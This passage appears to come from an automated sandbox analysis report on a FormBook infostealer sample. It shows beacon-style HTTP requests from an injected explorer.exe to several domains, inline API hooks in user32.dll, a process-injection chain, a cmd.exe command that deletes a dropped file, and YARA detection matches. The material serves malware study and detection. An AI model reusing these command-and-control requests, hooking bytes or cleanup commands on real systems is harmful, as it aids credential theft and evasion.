                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.349739198.49.23.14180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 20, 2020 20:06:07.740803957 CET5046OUTGET /glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP HTTP/1.1
                                                    Host: www.themaskedstitcher.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Nov 20, 2020 20:06:07.845019102 CET5048INHTTP/1.1 400 Bad Request
                                                    content-length: 77564
                                                    expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                    pragma: no-cache
                                                    cache-control: no-cache, must-revalidate
                                                    content-type: text/html; charset=UTF-8
                                                    connection: close
                                                    date: Fri, 20 Nov 2020 19:06:07 UTC
                                                    x-contextid: P1FGM9Sl/6DPVlN07
                                                    server: Squarespace
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                    Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.2.349741162.0.232.11880C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 20, 2020 20:06:28.447581053 CET5134OUTGET /glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh HTTP/1.1
                                                    Host: www.auctionpros.club
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Nov 20, 2020 20:06:28.654195070 CET5136INHTTP/1.1 404 Not Found
                                                    Date: Fri, 20 Nov 2020 19:06:28 GMT
                                                    Server: Apache
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html
                                                    Connection: close
                                                    Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61
                                                    Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .conta


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function NameHook TypeActive in Processes
                                                    PeekMessageAINLINEexplorer.exe
                                                    PeekMessageWINLINEexplorer.exe
                                                    GetMessageWINLINEexplorer.exe
                                                    GetMessageAINLINEexplorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: user32.dll
                                                    Function NameHook TypeNew Data
                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE5
                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE5
                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE5
                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE5

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: vOKMFxiCYt.exe PID: 2764 Parent PID: 5484

                                                    General

                                                    Start time:20:04:28
                                                    Start date:20/11/2020
                                                    Path:C:\Users\user\Desktop\vOKMFxiCYt.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\vOKMFxiCYt.exe'
                                                    Imagebase:0x620000
                                                    File size:711168 bytes
                                                    MD5 hash:BB30A5DD4130B071FB4CA5F005371C63
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Analysis Process: RegSvcs.exe PID: 5984 Parent PID: 2764

                                                    General

                                                    Start time:20:04:30
                                                    Start date:20/11/2020
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Imagebase:0xce0000
                                                    File size:45152 bytes
                                                    MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    Analysis Process: explorer.exe PID: 3388 Parent PID: 5984

                                                    General

                                                    Start time:20:04:32
                                                    Start date:20/11/2020
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:
                                                    Imagebase:0x7ff714890000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: raserver.exe PID: 5028 Parent PID: 3388

                                                    General

                                                    Start time:20:04:42
                                                    Start date:20/11/2020
                                                    Path:C:\Windows\SysWOW64\raserver.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\raserver.exe
                                                    Imagebase:0x1170000
                                                    File size:108544 bytes
                                                    MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    Analysis Process: cmd.exe PID: 6040 Parent PID: 5028

                                                    General

                                                    Start time:20:04:46
                                                    Start date:20/11/2020
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                    Imagebase:0xbd0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: conhost.exe PID: 4104 Parent PID: 6040

                                                    General

                                                    Start time:20:04:46
                                                    Start date:20/11/2020
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6b2800000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >